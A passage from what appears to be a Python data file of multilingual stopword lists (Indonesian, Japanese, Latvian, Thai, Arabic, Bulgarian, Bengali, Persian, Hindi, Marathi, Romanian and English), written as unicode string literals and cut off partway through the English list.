nya",u"disini",u"disinilah",u"dong",u"dulu",u"enggak",u"enggaknya",u"entah",u"entahlah",u"hal",u"hampir",u"hanya",u"hanyalah",u"harus",u"haruslah",u"harusnya",u"hendak",u"hendaklah",u"hendaknya",u"hingga",u"ia",u"ialah",u"ibarat",u"ingin",u"inginkah",u"inginkan",u"ini",u"inikah",u"inilah",u"itu",u"itukah",u"itulah",u"jangan",u"jangankan",u"janganlah",u"jika",u"jikalau",u"juga",u"justru",u"kala",u"kalau",u"kalaulah",u"kalaupun",u"kalian",u"kami",u"kamilah",u"kamu",u"kamulah",u"kan",u"kapan",u"kapankah",u"kapanpun",u"karena",u"karenanya",u"ke",u"kecil",u"kemudian",u"kenapa",u"kepada",u"kepadanya",u"ketika",u"khususnya",u"kini",u"kinilah",u"kiranya",u"kita",u"kitalah",u"kok",u"lagi",u"lagian",u"lah",u"lain",u"lainnya",u"lalu",u"lama",u"lamanya",u"lebih",u"macam",u"maka",u"makanya",u"makin",u"malah",u"malahan",u"mampu",u"mampukah",u"mana",u"manakala",u"manalagi",u"masih",u"masihkah",u"masing",u"mau",u"maupun",u"melainkan",u"melalui",u"memang",u"mengapa",u"mereka",u"merekalah",u"merupakan",u"meski",u"meskipun",u"mungkin",u"mungkinkah",u"nah",u"namun",u"nanti",u"nantinya",u"nyaris",u"oleh",u"olehnya",u"pada",u"padahal",u"padanya",u"paling",u"pantas",u"para",u"pasti",u"pastilah",u"per",u"percuma",u"pernah",u"pula",u"pun",u"rupanya",u"saat",u"saatnya",u"saja",u"sajalah",u"saling",u"sama",u"sambil",u"sampai",u"sana",u"sangat",u"sangatlah",u"saya",u"sayalah",u"se",u"sebab",u"sebabnya",u"sebagai",u"sebagaimana",u"sebagainya",u"sebaliknya",u"sebanyak",u"sebegini",u"sebegitu",u"sebelum",u"sebelumnya",u"sebenarnya",u"seberapa",u"sebetulnya",u"sebisanya",u"sebuah",u"sedang",u"sedangkan",u"sedemikian",u"sedikit",u"sedikitnya",u"segala",u"segalanya",u"segera",u"seharusnya",u"sehingga",u"sejak",u"sejenak",u"sekali",u"sekalian",u"sekaligus",u"sekalipun",u"sekarang",u"seketika",u"sekiranya",u"sekitar",u"sekitarnya",u"sela",u"selagi",u"selain",u"selaku",u"selalu",u"selama",u"selamanya",u"seluruh",u"seluruhnya",u"semacam",u"semakin",u"semasih",u"semaunya",u"sementara",u"sempat",u"semua",u"semuanya",u"semula",u"sendiri",u"sendirinya",u"seolah",u"seorang",u"sepanjang",u"sepantasnya",u"sepantasnyalah",u"seperti",u"sepertinya",u"sering",u"seringnya",u"serta",u"serupa",u"sesaat",u"sesama",u"sesegera",u"sesekali",u"seseorang",u"sesuatu",u"sesuatunya",u"sesudah",u"sesudahnya",u"setelah",u"seterusnya",u"setiap",u"setidaknya",u"sewaktu",u"siapa",u"siapakah",u"siapapun",u"sini",u"sinilah",u"suatu",u"sudah",u"sudahkah",u"sudahlah",u"supaya",u"tadi",u"tadinya",u"tak",u"tanpa",u"tapi",u"telah",u"tentang",u"tentu",u"tentulah",u"tentunya",u"terdiri",u"terhadap",u"terhadapnya",u"terlalu",u"terlebih",u"tersebut",u"tersebutlah",u"tertentu",u"tetapi",u"tiap",u"tidak",u"tidakkah",u"tidaklah",u"toh",u"waduh",u"wah",u"wahai",u"walau",u"walaupun",u"wong",u"yaitu",u"yakni",u"yang"],u"ja":[u"あっ",u"あり",u"ある",u"い",u"いう",u"いる",u"う",u"うち",u"お",u"および",u"おり",u"か",u"かつて",u"から",u"が",u"き",u"ここ",u"こと",u"この",u"これ",u"これら",u"さ",u"さらに",u"し",u"しかし",u"する",u"ず",u"せ",u"せる",u"そして",u"その",u"その他",u"その後",u"それ",u"それぞれ",u"た",u"ただし",u"たち",u"ため",u"たり",u"だ",u"だっ",u"つ",u"て",u"で",u"でき",u"できる",u"です",u"では",u"でも",u"と",u"という",u"といった",u"とき",u"ところ",u"として",u"とともに",u"とも",u"と共に",u"な",u"ない",u"なお",u"なかっ",u"ながら",u"なく",u"なっ",u"など",u"なら",u"なり",u"なる",u"に",u"において",u"における",u"について",u"にて",u"によって",u"により",u"による",u"に対して",u"に対する",u"に関する",u"の",u"ので",u"のみ",u"は",u"ば",u"へ",u"ほか",u"ほとんど",u"ほど",u"ます",u"また",u"または",u"まで",u"も",u"もの",u"ものの",u"や",u"よう",u"より",u"ら",u"られ",u"られる",u"れ",u"れる",u"を",u"ん",u"及び",u"特に"],u"lv":[u"aiz",u"ap",u"apakš",u"apakšpus",u"ar",u"arī",u"augšpus",u"bet",u"bez",u"bija",u"biji",u"biju",u"bijām",u"bijāt",u"būs",u"būsi",u"būsiet",u"būsim",u"būt",u"būšu",u"caur",u"diemžēl",u"diezin",u"droši",u"dēļ",u"esam",u"esat",u"esi",u"esmu",u"gan",u"gar",u"iekam",u"iekams",u"iekām",u"iekāms",u"iekš",u"iekšpus",u"ik",u"ir",u"it",u"itin",u"iz",u"ja",u"jau",u"jeb",u"jebšu",u"jel",u"jo",u"jā",u"ka",u"kamēr",u"kaut",u"kolīdz",u"kopš",u"kā",u"kļuva",u"kļuvi",u"kļuvu",u"kļuvām",u"kļuvāt",u"kļūs",u"kļūsi",u"kļūsiet",u"kļūsim",u"kļūst",u"kļūstam",u"kļūstat",u"kļūsti",u"kļūstu",u"kļūt",u"kļūšu",u"labad",u"lai",u"lejpus",u"līdz",u"līdzko",u"ne",u"nebūt",u"nedz",u"nekā",u"nevis",u"nezin",u"no",u"nu",u"nē",u"otrpus",u"pa",u"par",u"pat",u"pie",u"pirms",u"pret",u"priekš",u"pār",u"pēc",u"starp",u"tad",u"tak",u"tapi",u"taps",u"tapsi",u"tapsiet",u"tapsim",u"tapt",u"tapāt",u"tapšu",u"taču",u"te",u"tiec",u"tiek",u"tiekam",u"tiekat",u"tieku",u"tik",u"tika",u"tikai",u"tiki",u"tikko",u"tiklab",u"tiklīdz",u"tiks",u"tiksiet",u"tiksim",u"tikt",u"tiku",u"tikvien",u"tikām",u"tikāt",u"tikšu",u"tomēr",u"topat",u"turpretim",u"turpretī",u"tā",u"tādēļ",u"tālab",u"tāpēc",u"un",u"uz",u"vai",u"var",u"varat",u"varēja",u"varēji",u"varēju",u"varējām",u"varējāt",u"varēs",u"varēsi",u"varēsiet",u"varēsim",u"varēt",u"varēšu",u"vien",u"virs",u"virspus",u"vis",u"viņpus",u"zem",u"ārpus",u"šaipus"],u"th":[u"กล่าว",u"กว่า",u"กัน",u"กับ",u"การ",u"ก็",u"ก่อน",u"ขณะ",u"ขอ",u"ของ",u"ขึ้น",u"คง",u"ครั้ง",u"ความ",u"คือ",u"จะ",u"จัด",u"จาก",u"จึง",u"ช่วง",u"ซึ่ง",u"ดัง",u"ด้วย",u"ด้าน",u"ตั้ง",u"ตั้งแต่",u"ตาม",u"ต่อ",u"ต่าง",u"ต่างๆ",u"ต้อง",u"ถึง",u"ถูก",u"ถ้า",u"ทั้ง",u"ทั้งนี้",u"ทาง",u"ที่",u"ที่สุด",u"ทุก",u"ทํา",u"ทําให้",u"นอกจาก",u"นัก",u"นั้น",u"นี้",u"น่า",u"นํา",u"บาง",u"ผล",u"ผ่าน",u"พบ",u"พร้อม",u"มา",u"มาก",u"มี",u"ยัง",u"รวม",u"ระหว่าง",u"รับ",u"ราย",u"ร่วม",u"ลง",u"วัน",u"ว่า",u"สุด",u"ส่ง",u"ส่วน",u"สําหรับ",u"หนึ่ง",u"หรือ",u"หลัง",u"หลังจาก",u"หลาย",u"หาก",u"อยาก",u"อยู่",u"อย่าง",u"ออก",u"อะไร",u"อาจ",u"อีก",u"เขา",u"เข้า",u"เคย",u"เฉพาะ",u"เช่น",u"เดียว",u"เดียวกัน",u"เนื่องจาก",u"เปิด",u"เปิดเผย",u"เป็น",u"เป็นการ",u"เพราะ",u"เพื่อ",u"เมื่อ",u"เรา",u"เริ่ม",u"เลย",u"เห็น",u"เอง",u"แต่",u"แบบ",u"แรก",u"และ",u"แล้ว",u"แห่ง",u"โดย",u"ใน",u"ให้",u"ได้",u"ไป",u"ไม่",u"ไว้"],u"ar":[u"،",u"أ",u"ا",u"اثر",u"اجل",u"احد",u"اخرى",u"اذا",u"اربعة",u"اطار",u"اعادة",u"اعلنت",u"اف",u"اكثر",u"اكد",u"الا",u"الاخيرة",u"الان",u"الاول",u"الاولى",u"التى",u"التي",u"الثاني",u"الثانية",u"الذاتي",u"الذى",u"الذي",u"الذين",u"السابق",u"الف",u"الماضي",u"المقبل",u"الوقت",u"الى",u"اليوم",u"اما",u"امام",u"امس",u"ان",u"انه",u"انها",u"او",u"اول",u"اي",u"ايار",u"ايام",u"ايضا",u"ب",u"باسم",u"بان",u"برس",u"بسبب",u"بشكل",u"بعد",u"بعض",u"بن",u"به",u"بها",u"بين",u"تم",u"ثلاثة",u"ثم",u"جميع",u"حاليا",u"حتى",u"حوالى",u"حول",u"حيث",u"حين",u"خلال",u"دون",u"ذلك",u"زيارة",u"سنة",u"سنوات",u"شخصا",u"صباح",u"صفر",u"ضد",u"ضمن",u"عام",u"عاما",u"عدة",u"عدد",u"عدم",u"عشر",u"عشرة",u"على",u"عليه",u"عليها",u"عن",u"عند",u"عندما",u"غدا",u"غير",u"ـ",u"ف",u"فان",u"فى",u"في",u"فيه",u"فيها",u"قال",u"قبل",u"قد",u"قوة",u"كان",u"كانت",u"كل",u"كلم",u"كما",u"لا",u"لدى",u"لقاء",u"لكن",u"للامم",u"لم",u"لن",u"له",u"لها",u"لوكالة",u"ما",u"مايو",u"مساء",u"مع",u"مقابل",u"مليار",u"مليون",u"من",u"منذ",u"منها",u"نحو",u"نفسه",u"نهاية",u"هذا",u"هذه",u"هناك",u"هو",u"هي",u"و",u"و6",u"واحد",u"واضاف",u"واضافت",u"واكد",u"وان",u"واوضح",u"وفي",u"وقال",u"وقالت",u"وقد",u"وقف",u"وكان",u"وكانت",u"ولا",u"ولم",u"ومن",u"وهو",u"وهي",u"يكون",u"يمكن",u"يوم"],u"bg":[u"а",u"автентичен",u"аз",u"ако",u"ала",u"бе",u"без",u"беше",u"би",u"бивш",u"бивша",u"бившо",u"бил",u"била",u"били",u"било",u"благодаря",u"близо",u"бъдат",u"бъде",u"бяха",u"в",u"вас",u"ваш",u"ваша",u"вероятно",u"вече",u"взема",u"ви",u"вие",u"винаги",u"внимава",u"време",u"все",u"всеки",u"всички",u"всичко",u"всяка",u"във",u"въпреки",u"върху",u"г",u"ги",u"главен",u"главна",u"главно",u"глас",u"го",u"година",u"години",u"годишен",u"д",u"да",u"дали",u"два",u"двама",u"двамата",u"две",u"двете",u"ден",u"днес",u"дни",u"до",u"добра",u"добре",u"добро",u"добър",u"докато",u"докога",u"дори",u"досега",u"доста",u"друг",u"друга",u"други",u"е",u"евтин",u"едва",u"един",u"една",u"еднаква",u"еднакви",u"еднакъв",u"едно",u"екип",u"ето",u"живот",u"за",u"забавям",u"зад",u"заедно",u"заради",u"засега",u"заспал",u"затова",u"защо",u"защото",u"и",u"из",u"или",u"им",u"има",u"имат",u"иска",u"й",u"каза",u"как",u"каква",u"какво",u"както",u"какъв",u"като",u"кога",u"когато",u"което",u"които",u"кой",u"който",u"колко",u"която",u"къде",u"където",u"към",u"лесен",u"лесно",u"ли",u"лош",u"м",u"май",u"малко",u"ме",u"между",u"мек",u"мен",u"месец",u"ми",u"много",u"мнозина",u"мога",u"могат",u"може",u"мокър",u"моля",u"момента",u"му",u"н",u"на",u"над",u"назад",u"най",u"направи",u"напред",u"например",u"нас",u"не",u"него",u"нещо",u"нея",u"ни",u"ние",u"никой",u"нито",u"нищо",u"но",u"нов",u"нова",u"нови",u"новина",u"някои",u"някой",u"няколко",u"няма",u"обаче",u"около",u"освен",u"особено",u"от",u"отгоре",u"отново",u"още",u"пак",u"по",u"повече",u"повечето",u"под",u"поне",u"поради",u"после",u"почти",u"прави",u"пред",u"преди",u"през",u"при",u"пък",u"първата",u"първи",u"първо",u"пъти",u"равен",u"равна",u"с",u"са",u"сам",u"само",u"се",u"сега",u"си",u"син",u"скоро",u"след",u"следващ",u"сме",u"смях",u"според",u"сред",u"срещу",u"сте",u"съм",u"със",u"също",u"т",u"т.н.",u"тази",u"така",u"такива",u"такъв",u"там",u"твой",u"те",u"тези",u"ти",u"то",u"това",u"тогава",u"този",u"той",u"толкова",u"точно",u"три",u"трябва",u"тук",u"тъй",u"тя",u"тях",u"у",u"утре",u"харесва",u"хиляди",u"ч",u"часа",u"че",u"често",u"чрез",u"ще",u"щом",u"юмрук",u"я",u"як"],u"bn":[u"অনেক",u"অন্য",u"অবশ্য",u"আগে",u"আছে",u"আজ",u"আবার",u"আমরা",u"আমাদের",u"আর",u"ই",u"উত্তর",u"উপর",u"উপরে",u"এ",u"এই",u"এক্",u"এখন",u"এত",u"এব",u"এমন",u"এমনি",u"এর",u"এস",u"এসে",u"ও",u"ওই",u"কমনে",u"করা",u"করে",u"কাছে",u"কাজ",u"কাজে",u"কারণ",u"কি",u"কিছু",u"কে",u"কেউ",u"কেখা",u"কেন",u"কোটি",u"কোনো",u"কয়েক",u"খুব",u"গিয়ে",u"গেল",u"চার",u"চালু",u"চেষ্টা",u"ছিল",u"জানা",u"জ্নজন",u"টি",u"তখন",u"তবে",u"তা",u"তাই",u"তো",u"থাকা",u"থেকে",u"দিন",u"দু",u"দুই",u"দেওয়া",u"ধামার",u"নতুন",u"না",u"নাগাদ",u"নিয়ে",u"নেওয়া",u"নয়",u"পর",u"পরে",u"পাচ",u"পি",u"পেয়্র্",u"প্রতি",u"প্রথম",u"প্রযন্ত",u"প্রাথমিক",u"প্রায়",u"বক্তব্য",u"বন",u"বলা",u"বলে",u"বলেন",u"বহু",u"বা",u"বি",u"বিভিন্ন",u"বেশ",u"বেশি",u"মতো",u"মধ্যে",u"মনে",u"যখন",u"যদি",u"যা",u"যাওয়া",u"যে",u"র",u"রকম",u"লক্ষ",u"শুধু",u"শুরু",u"সঙ্গে",u"সব",u"সহ",u"সাধারণ",u"সামনে",u"সি",u"সে",u"সেই",u"হতে",u"হাজার",u"হয়"],u"fa":[u"آباد",u"آره",u"آری",u"آمد",u"آمده",u"آن",u"آنان",u"آنجا",u"آنكه",u"آنها",u"آنچه",u"آورد",u"آورده",u"آيد",u"آیا",u"اثرِ",u"از",u"است",u"استفاده",u"اش",u"اكنون",u"البته",u"البتّه",u"ام",u"اما",u"امروز",u"امسال",u"اند",u"انکه",u"او",u"اول",u"اي",u"ايشان",u"ايم",u"اين",u"اينكه",u"اگر",u"با",u"بار",u"بارة",u"باره",u"باشد",u"باشند",u"باشيم",u"بالا",u"بالایِ",u"بايد",u"بدون",u"بر",u"برابرِ",u"براساس",u"براي",u"برایِ",u"برخوردار",u"برخي",u"برداري",u"بروز",u"بسيار",u"بسياري",u"بعد",u"بعری",u"بعضي",u"بلكه",u"بله",u"بلکه",u"بلی",u"بنابراين",u"بندي",u"به",u"بهترين",u"بود",u"بودن",u"بودند",u"بوده",u"بي",u"بيست",u"بيش",u"بيشتر",u"بيشتري",u"بين",u"بی",u"بیرونِ",u"تا",u"تازه",u"تاكنون",u"تان",u"تحت",u"تر",u"ترين",u"تمام",u"تمامي",u"تنها",u"تواند",u"توانند",u"توسط",u"تولِ",u"تویِ",u"جا",u"جاي",u"جايي",u"جدا",u"جديد",u"جريان",u"جز",u"جلوگيري",u"جلویِ",u"حتي",u"حدودِ",u"حق",u"خارجِ",u"خدمات",u"خواست",u"خواهد",u"خواهند",u"خواهيم",u"خود",u"خويش",u"خیاه",u"داد",u"دادن",u"دادند",u"داده",u"دارد",u"دارند",u"داريم",u"داشت",u"داشتن",u"داشتند",u"داشته",u"دانست",u"دانند",u"در",u"درباره",u"دنبالِ",u"ده",u"دهد",u"دهند",u"دو",u"دوم",u"ديده",u"ديروز",u"ديگر",u"ديگران",u"ديگري",u"دیگر",u"را",u"راه",u"رفت",u"رفته",u"روب",u"روزهاي",u"روي",u"رویِ",u"ريزي",u"زياد",u"زير",u"زيرا",u"زیرِ",u"سابق",u"ساخته",u"سازي",u"سراسر",u"سریِ",u"سعي",u"سمتِ",u"سوم",u"سوي",u"سویِ",u"سپس",u"شان",u"شايد",u"شد",u"شدن",u"شدند",u"شده",u"شش",u"شما",u"شناسي",u"شود",u"شوند",u"صورت",u"ضدِّ",u"ضمن",u"طبقِ",u"طريق",u"طور",u"طي",u"عقبِ",u"علّتِ",u"عنوانِ",u"غير",u"فقط",u"فكر",u"فوق",u"قابل",u"قبل",u"قصدِ",u"كرد",u"كردم",u"كردن",u"كردند",u"كرده",u"كسي",u"كل",u"كمتر",u"كند",u"كنم",u"كنند",u"كنيد",u"كنيم",u"كه",u"لطفاً",u"ما",u"مان",u"مانند",u"مانندِ",u"مثل",u"مثلِ",u"مختلف",u"مدّتی",u"مردم",u"مرسی",u"مقابل",u"من",u"مورد",u"مي",u"ميليارد",u"ميليون",u"مگر",u"ناشي",u"نام",u"نبايد",u"نبود",u"نخست",u"نخستين",u"نخواهد",u"ندارد",u"ندارند",u"نداشته",u"نزديك",u"نزدِ",u"نزدیکِ",u"نشان",u"نشده",u"نظير",u"نكرده",u"نمايد",u"نمي",u"نه",u"نوعي",u"نيز",u"نيست",u"ها",u"هاي",u"هايي",u"هر",u"هرگز",u"هزار",u"هست",u"هستند",u"هستيم",u"هفت",u"هم",u"همان",u"همه",u"همواره",u"همين",u"همچنان",u"همچنين",u"همچون",u"همین",u"هنوز",u"هنگام",u"هنگامِ",u"هنگامی",u"هيچ",u"هیچ",u"و",u"وسطِ",u"وقتي",u"وقتیکه",u"ولی",u"وي",u"وگو",u"يا",u"يابد",u"يك",u"يكديگر",u"يكي",u"ّه",u"پاعینِ",u"پس",u"پنج",u"پيش",u"پیش",u"پیشِ",u"چرا",u"چطور",u"چند",u"چندین",u"چنين",u"چه",u"چهار",u"چون",u"چيزي",u"چگونه",u"چیز",u"چیزی",u"چیست",u"کجا",u"کجاست",u"کدام",u"کس",u"کسی",u"کنارِ",u"که",u"کَی",u"کی",u"گذاري",u"گذاشته",u"گردد",u"گرفت",u"گرفته",u"گروهي",u"گفت",u"گفته",u"گويد",u"گويند",u"گيرد",u"گيري",u"یا",u"یک"],u"hi":[u"अंदर",u"अत",u"अदि",u"अप",u"अपना",u"अपनि",u"अपनी",u"अपने",u"अभि",u"अभी",u"आदि",u"आप",u"इंहिं",u"इंहें",u"इंहों",u"इतयादि",u"इत्यादि",u"इन",u"इनका",u"इन्हीं",u"इन्हें",u"इन्हों",u"इस",u"इसका",u"इसकि",u"इसकी",u"इसके",u"इसमें",u"इसि",u"इसी",u"इसे",u"उंहिं",u"उंहें",u"उंहों",u"उन",u"उनका",u"उनकि",u"उनकी",u"उनके",u"उनको",u"उन्हीं",u"उन्हें",u"उन्हों",u"उस",u"उसके",u"उसि",u"उसी",u"उसे",u"एक",u"एवं",u"एस",u"एसे",u"ऐसे",u"ओर",u"और",u"कइ",u"कई",u"कर",u"करता",u"करते",u"करना",u"करने",u"करें",u"कहते",u"कहा",u"का",u"काफि",u"काफ़ी",u"कि",u"किंहें",u"किंहों",u"कितना",u"किन्हें",u"किन्हों",u"किया",u"किर",u"किस",u"किसि",u"किसी",u"किसे",u"की",u"कुछ",u"कुल",u"के",u"को",u"कोइ",u"कोई",u"कोन",u"कोनसा",u"कौन",u"कौनसा",u"गया",u"घर",u"जब",u"जहाँ",u"जहां",u"जा",u"जिंहें",u"जिंहों",u"जितना",u"जिधर",u"जिन",u"जिन्हें",u"जिन्हों",u"जिस",u"जिसे",u"जीधर",u"जेसा",u"जेसे",u"जैसा",u"जैसे",u"जो",u"तक",u"तब",u"तरह",u"तिंहें",u"तिंहों",u"तिन",u"तिन्हें",u"तिन्हों",u"तिस",u"तिसे",u"तो",u"था",u"थि",u"थी",u"थे",u"दबारा",u"दवारा",u"दिया",u"दुसरा",u"दुसरे",u"दूसरे",u"दो",u"द्वारा",u"न",u"नहिं",u"नहीं",u"ना",u"निचे",u"निहायत",u"नीचे",u"ने",u"पर",u"पहले",u"पुरा",u"पूरा",u"पे",u"फिर",u"बनि",u"बनी",u"बहि",u"बही",u"बहुत",u"बाद",u"बाला",u"बिलकुल",u"भि",u"भितर",u"भी",u"भीतर",u"मगर",u"मानो",u"मे",u"में",u"यदि",u"यह",u"यहाँ",u"यहां",u"यहि",u"यही",u"या",u"यिह",u"ये",u"रखें",u"रवासा",u"रहा",u"रहे",u"ऱ्वासा",u"लिए",u"लिये",u"लेकिन",u"व",u"वगेरह",u"वरग",u"वर्ग",u"वह",u"वहाँ",u"वहां",u"वहिं",u"वहीं",u"वाले",u"वुह",u"वे",u"वग़ैरह",u"संग",u"सकता",u"सकते",u"सबसे",u"सभि",u"सभी",u"साथ",u"साबुत",u"साभ",u"सारा",u"से",u"सो",u"हि",u"ही",u"हुअ",u"हुआ",u"हुइ",u"हुई",u"हुए",u"हे",u"हें",u"है",u"हैं",u"हो",u"होता",u"होति",u"होती",u"होते",u"होना",u"होने"],u"mr":[u"अधिक",u"अनेक",u"अशी",u"असलयाचे",u"असलेल्या",u"असा",u"असून",u"असे",u"आज",u"आणि",u"आता",u"आपल्या",u"आला",u"आली",u"आले",u"आहे",u"आहेत",u"एक",u"एका",u"कमी",u"करणयात",u"करून",u"का",u"काम",u"काय",u"काही",u"किवा",u"की",u"केला",u"केली",u"केले",u"कोटी",u"गेल्या",u"घेऊन",u"जात",u"झाला",u"झाली",u"झाले",u"झालेल्या",u"टा",u"डॉ",u"तर",u"तरी",u"तसेच",u"ता",u"ती",u"तीन",u"ते",u"तो",u"त्या",u"त्याचा",u"त्याची",u"त्याच्या",u"त्याना",u"त्यानी",u"त्यामुळे",u"त्री",u"दिली",u"दोन",u"न",u"नाही",u"निर्ण्य",u"पण",u"पम",u"परयतन",u"पाटील",u"म",u"मात्र",u"माहिती",u"मी",u"मुबी",u"म्हणजे",u"म्हणाले",u"म्हणून",u"या",u"याचा",u"याची",u"याच्या",u"याना",u"यानी",u"येणार",u"येत",u"येथील",u"येथे",u"लाख",u"व",u"व्यकत",u"सर्व",u"सागित्ले",u"सुरू",u"हजार",u"हा",u"ही",u"हे",u"होणार",u"होत",u"होता",u"होती",u"होते"],u"ro":[u"acea",u"aceasta",u"această",u"aceea",u"acei",u"aceia",u"acel",u"acela",u"acele",u"acelea",u"acest",u"acesta",u"aceste",u"acestea",u"aceşti",u"aceştia",u"acolo",u"acord",u"acum",u"ai",u"aia",u"aibă",u"aici",u"al",u"ale",u"alea",u"altceva",u"altcineva",u"am",u"ar",u"are",u"asemenea",u"asta",u"astea",u"astăzi",u"asupra",u"au",u"avea",u"avem",u"aveţi",u"azi",u"aş",u"aşadar",u"aţi",u"bine",u"bucur",u"bună",u"ca",u"care",u"caut",u"ce",u"cel",u"ceva",u"chiar",u"cinci",u"cine",u"cineva",u"contra",u"cu",u"cum",u"cumva",u"curând",u"curînd",u"când",u"cât",u"câte",u"câtva",u"câţi",u"cînd",u"cît",u"cîte",u"cîtva",u"cîţi",u"că",u"căci",u"cărei",u"căror",u"cărui",u"către",u"da",u"dacă",u"dar",u"datorită",u"dată",u"dau",u"de",u"deci",u"deja",u"deoarece",u"departe",u"deşi",u"din",u"dinaintea",u"dintr-",u"dintre",u"doi",u"doilea",u"două",u"drept",u"după",u"dă",u"ea",u"ei",u"el",u"ele",u"eram",u"este",u"eu",u"eşti",u"face",u"fata",u"fi",u"fie",u"fiecare",u"fii",u"fim",u"fiu",u"fiţi",u"frumos",u"fără",u"graţie",u"halbă",u"iar",u"ieri",u"la",u"le",u"li",u"lor",u"lui",u"lângă",u"lîngă",u"mai",u"mea",u"mei",u"mele",u"mereu",u"meu",u"mi",u"mie",u"mine",u"mult",u"multă",u"mulţi",u"mulţumesc",u"mâine",u"mîine",u"mă",u"ne",u"nevoie",u"nici",u"nicăieri",u"nimeni",u"nimeri",u"nimic",u"nişte",u"noastre",u"noastră",u"noi",u"noroc",u"nostru",u"nouă",u"noştri",u"nu",u"opt",u"ori",u"oricare",u"orice",u"oricine",u"oricum",u"oricând",u"oricât",u"oricînd",u"oricît",u"oriunde",u"patra",u"patru",u"patrulea",u"pe",u"pentru",u"peste",u"pic",u"poate",u"pot",u"prea",u"prima",u"primul",u"prin",u"printr-",u"puţin",u"puţina",u"puţină",u"până",u"pînă",u"rog",u"sa",u"sale",u"sau",u"se",u"spate",u"spre",u"sub",u"sunt",u"suntem",u"sunteţi",u"sută",u"sînt",u"sîntem",u"sînteţi",u"să",u"săi",u"său",u"ta",u"tale",u"te",u"timp",u"tine",u"toate",u"toată",u"tot",u"totuşi",u"toţi",u"trei",u"treia",u"treilea",u"tu",u"tăi",u"tău",u"un",u"una",u"unde",u"undeva",u"unei",u"uneia",u"unele",u"uneori",u"unii",u"unor",u"unora",u"unu",u"unui",u"unuia",u"unul",u"vi",u"voastre",u"voastră",u"voi",u"vostru",u"vouă",u"voştri",u"vreme",u"vreo",u"vreun",u"vă",u"zece",u"zero",u"zi",u"zice",u"îi",u"îl",u"îmi",u"împotriva",u"în",u"înainte",u"înaintea",u"încotro",u"încât",u"încît",u"între",u"întrucât",u"întrucît",u"îţi",u"ăla",u"ălea",u"ăsta",u"ăstea",u"ăştia",u"şapte",u"şase",u"şi",u"ştiu",u"ţi",u"ţie"],u"en":[u"a",u"a's",u"able",u"about",u"above",u"according",u"accordingly",u"across",u"actually",u"after",u"afterwards",u"again",u"against",u"ain't",u"all",u"allow",u"allows",u"almost",u"alone",u"along",u"already",u"also",u"although",u"always",u"am",u"among",u"amongst",u"an",u"and",u"another",u"any",u"anybody",u"anyhow",u"anyone",u"anything",u"anyway",u"anyways",u"anywhere",u"apart",u"appear",u"appreciate",u"appropriate",u"are",u"aren't",u"around",u"as",u"aside",u"ask",u"asking",u"associated",u"at",u"available",u"away",u"awfully",u"b",u"be",u"became",u"because",u"become",u"becomes",u"becoming",u"been",u"before",u"beforehand",u"behind",u"being",u"believe",u"below",u"beside",u"besides",u"best",u"better",u"between",u"beyond",u"both",u"brief",u"but",u"by",u"c",u"c'mon",u"c's",u"came",u"can",u"can't",u"cannot",u"cant",u"cause",u"causes",u"certain",u"certainly",u"changes",u"clearly",u"co",u"com",u"come",u"comes",u"concerning",u"consequently",u"consider",u"considering",u"contain",u"containing",u"contains",u"corresponding",u"could",u"couldn't",u"course",u"currently",u"d",u"definitely",u"described",u"despite",u"did",u"didn't",u"different",u"do",u"does",u"doesn't",u"doing",u"don't",u"done",u"down",u"downwards",u"during",u"e",u"each",u"edu",u"eg",u"eight",u"either",u"else",u"elsewhere",u"enough",u"entirely",u"especially",u"et",u"etc",u"even",u"ever",u"every",u"everybody",u"everyone",u"everything",u"everywhere",u"ex",u"exactly",u"example",u"except",u"f",u"far",u"few",u"fifth",u"first",u"five",u"followed",u"following",u"follows",u"for",u"former",u"formerly",u"forth",u"four",u"from",u"further",u"furthermore",u"g",u"get",u"gets",u"getting",u"given",u"gives",u"go",u"goes",u"going",u"gone",u"got",u"gotten",u"greetings",u"h",u"had",u"hadn't",u"happens",u"hardly",u"has",u"hasn't",u"have",u"haven't",u"having",u"he",u"he's",u"hello",u"help",u"hence",u"her",u"here",u"here's",u"hereafter",u"hereby",u"herein",u"hereupon",u"hers",u"herself",u"hi",u"him",u"himself",u"his",u"hither",u"hopefully",u"how",u"howbeit",u"however",u"i",u"i'd",u"i'll",u"i'm",u"i've",u"ie",u"if",u"ignored",u"immediate",u"in",u"inasmuch",u"inc",u"indeed",u"indicate",u"indicated",u"indicates",u"inner",u"insofar",u"instead",u"into",u"inward",u"is",u"isn't",u"it",u"it'd",u"it'll",u"it's",u"its",u"itself",u"j",u"just",u"k",u"keep",u"keeps",u"kept",u"know",u"known",u"knows",u"l",u"last",u"lately",u"later",u"latter",u"latterly",u"least",u"less",u"lest",u"let",u"let's",u"like",u"liked",u"likely",u"little",u"look",u"looking",u"looks",u"ltd",u"m",u"mainly",u"many",u"may",u"maybe",u"me",u"mean",u"meanwhile",u"merely",u"might",u"more",u"moreover",u"most",u"mostly",u"much",u"must",u"my",u"myself",u"n",u"name",u"namely",u"nd",u"near",u"nearly",u"necessary",u"need",u"needs",u"neither",u"never",u"nevertheless",u"new",u"next",u"nine",u"no",u"nobody",u"non",u"none",u"noone",u"nor",u"normally",u"not",u"nothing",u"novel",u"now",u"nowhere",u"o",u"obviously",u"of",u"off",u"often",u"oh",u"ok",u"okay",u"old",u"on",u"once",u"one",u"ones",u"only",u"onto",u"or",u"other",u"others",u"otherwise",u"ought",u"our",u"ours",u"ourselves",u"out",u"outside",u"over",u"overall",u"own",u"p",u"particular",u"particularly",u"per",u"perhaps",u"placed",u"please",u"plus",u"possible",u"presumably",u"probably",u"provides",u"q",u"que",u"quite",u"qv",u"r",u"rather",u"rd",u"re",u"really",u"reasonably",u"regarding",u"regardless",u"regards",u"relatively",u"respectively",u"right",u"s",u"said",u"same",u"saw",u"say",u"saying",u"says",u"second",u"secondly",u"see",u"seeing",u"seem",u"seemed",u"seeming",u"seems",u"seen",u"self",u"selves",u"sensible",u"sent",u"serious",u"seriously",u"seven",u"several",u"shall",u"she",u"should",u"shouldn't",u"since",u"six",u"so",u"some",u"somebody",u"somehow",u"someone",u"something",u"sometime",u"sometimes",u"somewhat",u"somewhere",u"soon",u"sorry",u"specified",u"specify",u"specifying",u"still",u"sub",u"such",u"sup",u"sure",u"t",u"t's",u"take",u"taken",u"tell",u"tends",u"th",u"than",u"thank",u"thanks",u"thanx",u"that",u"that's",u"thats",u"the",u"their",u"theirs",u"them",u"themselves",u"then",u"thence",u"there",u"there's",u"thereafter",u"thereby",u"therefore",u"therein",u"theres",u"thereupon",u"these",u"they",u"they'd",u"they'll",u"they're",u"they've",u"think",u"third",u"this",u"thorough",u"thoroughly",u"those",u"though",u"